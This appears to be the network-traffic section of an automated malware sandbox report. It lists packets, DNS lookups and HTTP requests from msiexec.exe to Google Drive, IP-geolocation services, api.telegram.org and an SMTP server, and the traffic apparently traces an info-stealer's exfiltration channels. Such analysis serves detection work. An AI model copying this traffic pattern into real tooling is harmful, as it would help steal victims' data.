Oct 24, 2024 03:40:49.851161003 CEST	80	49918	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:49.851231098 CEST	49918	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:49.851471901 CEST	49918	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:49.856792927 CEST	80	49918	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:51.396505117 CEST	80	49918	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:51.399343014 CEST	49918	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:51.404767990 CEST	80	49918	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:51.666932106 CEST	80	49918	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:51.748152971 CEST	49918	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:51.973716974 CEST	49933	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:51.973799944 CEST	443	49933	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:51.973887920 CEST	49933	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:51.975390911 CEST	49933	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:51.975467920 CEST	443	49933	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:52.593024015 CEST	443	49933	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:52.593151093 CEST	49933	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:52.596282959 CEST	49933	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:52.596308947 CEST	443	49933	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:52.596611977 CEST	443	49933	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:52.601109028 CEST	49933	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:52.643374920 CEST	443	49933	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:53.004837990 CEST	443	49933	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:53.004930019 CEST	443	49933	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:53.005110979 CEST	49933	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:53.010411978 CEST	49933	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:53.018321037 CEST	49918	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:53.024184942 CEST	80	49918	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:53.295629978 CEST	80	49918	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:53.299370050 CEST	49939	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:53.299413919 CEST	443	49939	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:53.299536943 CEST	49939	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:53.299946070 CEST	49939	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:53.299966097 CEST	443	49939	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:53.435616970 CEST	49918	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:53.907886982 CEST	443	49939	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:53.910525084 CEST	49939	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:53.910552979 CEST	443	49939	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:54.058475971 CEST	443	49939	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:54.058548927 CEST	443	49939	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:54.058742046 CEST	49939	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:54.059655905 CEST	49939	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:54.062963009 CEST	49918	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:54.064300060 CEST	49945	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:54.068634033 CEST	80	49918	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:54.068783045 CEST	49918	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:54.069693089 CEST	80	49945	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:54.069977045 CEST	49945	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:54.069977045 CEST	49945	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:54.075459003 CEST	80	49945	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:55.424243927 CEST	80	49945	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:55.425278902 CEST	49955	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:55.425319910 CEST	443	49955	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:55.425378084 CEST	49955	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:55.425565958 CEST	49955	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:55.425576925 CEST	443	49955	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:55.466840029 CEST	49945	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:56.034483910 CEST	443	49955	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:56.035897017 CEST	49955	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:56.035933971 CEST	443	49955	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:56.184348106 CEST	443	49955	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:56.184568882 CEST	443	49955	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:56.184637070 CEST	49955	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:56.185451031 CEST	49955	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:56.192255020 CEST	49945	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:56.193300009 CEST	49961	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:56.197875977 CEST	80	49945	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:56.198139906 CEST	49945	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:56.198676109 CEST	80	49961	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:56.198883057 CEST	49961	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:56.198883057 CEST	49961	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:56.204265118 CEST	80	49961	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:57.110791922 CEST	80	49961	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:57.112773895 CEST	49967	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:57.112822056 CEST	443	49967	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:57.112905025 CEST	49967	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:57.113121033 CEST	49967	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:57.113135099 CEST	443	49967	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:57.154416084 CEST	49961	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:57.729863882 CEST	443	49967	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:57.731216908 CEST	49967	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:57.731281996 CEST	443	49967	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:57.881192923 CEST	443	49967	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:57.881275892 CEST	443	49967	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:57.881473064 CEST	49967	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:57.881673098 CEST	49967	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:57.885771036 CEST	49971	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:57.891180038 CEST	80	49971	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:57.891402960 CEST	49971	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:57.891488075 CEST	49971	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:40:57.896770954 CEST	80	49971	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:59.550894022 CEST	80	49971	132.226.8.169	192.168.2.4
Oct 24, 2024 03:40:59.552130938 CEST	49981	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:59.552176952 CEST	443	49981	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:59.552366018 CEST	49981	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:59.552445889 CEST	49981	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:40:59.552462101 CEST	443	49981	188.114.96.3	192.168.2.4
Oct 24, 2024 03:40:59.591912031 CEST	49971	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:00.164689064 CEST	443	49981	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:00.166099072 CEST	49981	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:00.166193962 CEST	443	49981	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:00.315651894 CEST	443	49981	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:00.315789938 CEST	443	49981	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:00.315843105 CEST	49981	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:00.316127062 CEST	49981	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:00.319422007 CEST	49971	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:00.320332050 CEST	49987	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:00.325005054 CEST	80	49971	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:00.325066090 CEST	49971	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:00.325603962 CEST	80	49987	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:00.325658083 CEST	49987	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:00.325725079 CEST	49987	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:00.330945015 CEST	80	49987	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:02.347038984 CEST	80	49987	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:02.388665915 CEST	49987	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:02.404140949 CEST	50001	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:02.404196024 CEST	443	50001	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:02.404411077 CEST	50001	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:02.404738903 CEST	50001	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:02.404768944 CEST	443	50001	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:03.026602983 CEST	443	50001	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:03.028079987 CEST	50001	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:03.028162003 CEST	443	50001	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:03.181816101 CEST	443	50001	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:03.182066917 CEST	443	50001	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:03.182282925 CEST	50001	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:03.182395935 CEST	50001	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:03.185183048 CEST	49987	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:03.186249018 CEST	50006	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:03.191059113 CEST	80	49987	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:03.191133022 CEST	49987	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:03.191683054 CEST	80	50006	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:03.191895008 CEST	50006	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:03.191895008 CEST	50006	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:03.197351933 CEST	80	50006	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:04.085059881 CEST	80	50006	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:04.086617947 CEST	50012	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:04.086668968 CEST	443	50012	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:04.086791992 CEST	50012	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:04.087044954 CEST	50012	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:04.087066889 CEST	443	50012	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:04.138762951 CEST	50006	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:04.708945990 CEST	443	50012	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:04.710983992 CEST	50012	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:04.711031914 CEST	443	50012	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:04.859333038 CEST	443	50012	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:04.859390020 CEST	443	50012	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:04.859446049 CEST	50012	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:04.859903097 CEST	50012	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:04.863938093 CEST	50006	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:04.864620924 CEST	50016	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:04.869524956 CEST	80	50006	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:04.869715929 CEST	50006	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:04.870004892 CEST	80	50016	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:04.870080948 CEST	50016	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:04.870170116 CEST	50016	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:04.876621962 CEST	80	50016	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:06.307337046 CEST	80	50016	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:06.308625937 CEST	50018	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:06.308691025 CEST	443	50018	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:06.308768034 CEST	50018	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:06.309025049 CEST	50018	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:06.309035063 CEST	443	50018	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:06.357403040 CEST	50016	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:06.921578884 CEST	443	50018	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:06.923310041 CEST	50018	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:06.923389912 CEST	443	50018	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:07.067909956 CEST	443	50018	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:07.068005085 CEST	443	50018	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:07.068067074 CEST	50018	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:07.068516016 CEST	50018	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:07.071566105 CEST	50016	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:07.072837114 CEST	50019	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:07.077236891 CEST	80	50016	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:07.077317953 CEST	50016	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:07.078282118 CEST	80	50019	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:07.078478098 CEST	50019	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:07.078478098 CEST	50019	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:07.083950043 CEST	80	50019	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:07.974011898 CEST	80	50019	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:07.975348949 CEST	50020	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:07.975435019 CEST	443	50020	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:07.975529909 CEST	50020	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:07.975905895 CEST	50020	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:07.975965023 CEST	443	50020	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:08.029422045 CEST	50019	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:08.601970911 CEST	443	50020	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:08.604660988 CEST	50020	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:08.604737043 CEST	443	50020	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:08.746237040 CEST	443	50020	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:08.746470928 CEST	443	50020	188.114.96.3	192.168.2.4
Oct 24, 2024 03:41:08.746629000 CEST	50020	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:08.747174025 CEST	50020	443	192.168.2.4	188.114.96.3
Oct 24, 2024 03:41:08.801157951 CEST	50019	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:08.807341099 CEST	80	50019	132.226.8.169	192.168.2.4
Oct 24, 2024 03:41:08.807460070 CEST	50019	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:08.810256958 CEST	50021	443	192.168.2.4	149.154.167.220
Oct 24, 2024 03:41:08.810302019 CEST	443	50021	149.154.167.220	192.168.2.4
Oct 24, 2024 03:41:08.810537100 CEST	50021	443	192.168.2.4	149.154.167.220
Oct 24, 2024 03:41:08.811034918 CEST	50021	443	192.168.2.4	149.154.167.220
Oct 24, 2024 03:41:08.811111927 CEST	443	50021	149.154.167.220	192.168.2.4
Oct 24, 2024 03:41:09.667439938 CEST	443	50021	149.154.167.220	192.168.2.4
Oct 24, 2024 03:41:09.667682886 CEST	50021	443	192.168.2.4	149.154.167.220
Oct 24, 2024 03:41:09.669841051 CEST	50021	443	192.168.2.4	149.154.167.220
Oct 24, 2024 03:41:09.669894934 CEST	443	50021	149.154.167.220	192.168.2.4
Oct 24, 2024 03:41:09.670423031 CEST	443	50021	149.154.167.220	192.168.2.4
Oct 24, 2024 03:41:09.672313929 CEST	50021	443	192.168.2.4	149.154.167.220
Oct 24, 2024 03:41:09.715419054 CEST	443	50021	149.154.167.220	192.168.2.4
Oct 24, 2024 03:41:09.906732082 CEST	443	50021	149.154.167.220	192.168.2.4
Oct 24, 2024 03:41:09.906888008 CEST	443	50021	149.154.167.220	192.168.2.4
Oct 24, 2024 03:41:09.906982899 CEST	50021	443	192.168.2.4	149.154.167.220
Oct 24, 2024 03:41:09.909753084 CEST	50021	443	192.168.2.4	149.154.167.220
Oct 24, 2024 03:41:15.944595098 CEST	49961	80	192.168.2.4	132.226.8.169
Oct 24, 2024 03:41:16.227138042 CEST	50022	587	192.168.2.4	213.165.67.102
Oct 24, 2024 03:41:16.232650995 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:16.232737064 CEST	50022	587	192.168.2.4	213.165.67.102
Oct 24, 2024 03:41:16.947912931 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:16.948311090 CEST	50022	587	192.168.2.4	213.165.67.102
Oct 24, 2024 03:41:16.953718901 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:17.192507029 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:17.192709923 CEST	50022	587	192.168.2.4	213.165.67.102
Oct 24, 2024 03:41:17.198815107 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:17.437714100 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:17.438220978 CEST	50022	587	192.168.2.4	213.165.67.102
Oct 24, 2024 03:41:17.443597078 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:17.684747934 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:17.684804916 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:17.684842110 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:17.684879065 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:17.685105085 CEST	50022	587	192.168.2.4	213.165.67.102
Oct 24, 2024 03:41:17.685105085 CEST	50022	587	192.168.2.4	213.165.67.102
Oct 24, 2024 03:41:17.686898947 CEST	50022	587	192.168.2.4	213.165.67.102
Oct 24, 2024 03:41:17.692251921 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:17.931056976 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:17.933434010 CEST	50022	587	192.168.2.4	213.165.67.102
Oct 24, 2024 03:41:17.938824892 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:18.177982092 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:18.178587914 CEST	50022	587	192.168.2.4	213.165.67.102
Oct 24, 2024 03:41:18.184037924 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:18.423163891 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:18.423784971 CEST	50022	587	192.168.2.4	213.165.67.102
Oct 24, 2024 03:41:18.429270029 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:18.702604055 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:18.702867985 CEST	50022	587	192.168.2.4	213.165.67.102
Oct 24, 2024 03:41:18.708306074 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:18.947148085 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:18.947649956 CEST	50022	587	192.168.2.4	213.165.67.102
Oct 24, 2024 03:41:18.953517914 CEST	587	50022	213.165.67.102	192.168.2.4
Oct 24, 2024 03:41:18.953588009 CEST	50022	587	192.168.2.4	213.165.67.102

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 03:40:42.022937059 CEST	63253	53	192.168.2.4	1.1.1.1
Oct 24, 2024 03:40:42.030735016 CEST	53	63253	1.1.1.1	192.168.2.4
Oct 24, 2024 03:40:43.337799072 CEST	58680	53	192.168.2.4	1.1.1.1
Oct 24, 2024 03:40:43.345191956 CEST	53	58680	1.1.1.1	192.168.2.4
Oct 24, 2024 03:40:49.480066061 CEST	56723	53	192.168.2.4	1.1.1.1
Oct 24, 2024 03:40:49.487385035 CEST	53	56723	1.1.1.1	192.168.2.4
Oct 24, 2024 03:40:51.965393066 CEST	63190	53	192.168.2.4	1.1.1.1
Oct 24, 2024 03:40:51.973067999 CEST	53	63190	1.1.1.1	192.168.2.4
Oct 24, 2024 03:41:08.801680088 CEST	53655	53	192.168.2.4	1.1.1.1
Oct 24, 2024 03:41:08.809638023 CEST	53	53655	1.1.1.1	192.168.2.4
Oct 24, 2024 03:41:16.217680931 CEST	62137	53	192.168.2.4	1.1.1.1
Oct 24, 2024 03:41:16.225517988 CEST	53	62137	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 24, 2024 03:40:42.022937059 CEST	192.168.2.4	1.1.1.1	0x9d9c	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Oct 24, 2024 03:40:43.337799072 CEST	192.168.2.4	1.1.1.1	0xeb6b	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Oct 24, 2024 03:40:49.480066061 CEST	192.168.2.4	1.1.1.1	0x1998	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 24, 2024 03:40:51.965393066 CEST	192.168.2.4	1.1.1.1	0x840c	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 24, 2024 03:41:08.801680088 CEST	192.168.2.4	1.1.1.1	0xa51c	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 24, 2024 03:41:16.217680931 CEST	192.168.2.4	1.1.1.1	0x3d2c	Standard query (0)	smtp.ionos.es	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 24, 2024 03:40:42.030735016 CEST	1.1.1.1	192.168.2.4	0x9d9c	No error (0)	drive.google.com		142.250.185.78	A (IP address)	IN (0x0001)	false
Oct 24, 2024 03:40:43.345191956 CEST	1.1.1.1	192.168.2.4	0xeb6b	No error (0)	drive.usercontent.google.com		142.250.186.161	A (IP address)	IN (0x0001)	false
Oct 24, 2024 03:40:49.487385035 CEST	1.1.1.1	192.168.2.4	0x1998	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 24, 2024 03:40:49.487385035 CEST	1.1.1.1	192.168.2.4	0x1998	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 24, 2024 03:40:49.487385035 CEST	1.1.1.1	192.168.2.4	0x1998	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 24, 2024 03:40:49.487385035 CEST	1.1.1.1	192.168.2.4	0x1998	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 24, 2024 03:40:49.487385035 CEST	1.1.1.1	192.168.2.4	0x1998	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 24, 2024 03:40:49.487385035 CEST	1.1.1.1	192.168.2.4	0x1998	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 24, 2024 03:40:51.973067999 CEST	1.1.1.1	192.168.2.4	0x840c	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 24, 2024 03:40:51.973067999 CEST	1.1.1.1	192.168.2.4	0x840c	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 24, 2024 03:41:08.809638023 CEST	1.1.1.1	192.168.2.4	0xa51c	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 24, 2024 03:41:16.225517988 CEST	1.1.1.1	192.168.2.4	0x3d2c	No error (0)	smtp.ionos.es		213.165.67.102	A (IP address)	IN (0x0001)	false
Oct 24, 2024 03:41:16.225517988 CEST	1.1.1.1	192.168.2.4	0x3d2c	No error (0)	smtp.ionos.es		213.165.67.118	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49918	132.226.8.169	80	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 03:40:49.851471901 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 24, 2024 03:40:51.396505117 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:40:51 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
Oct 24, 2024 03:40:51.399343014 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 24, 2024 03:40:51.666932106 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:40:51 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
Oct 24, 2024 03:40:53.018321037 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
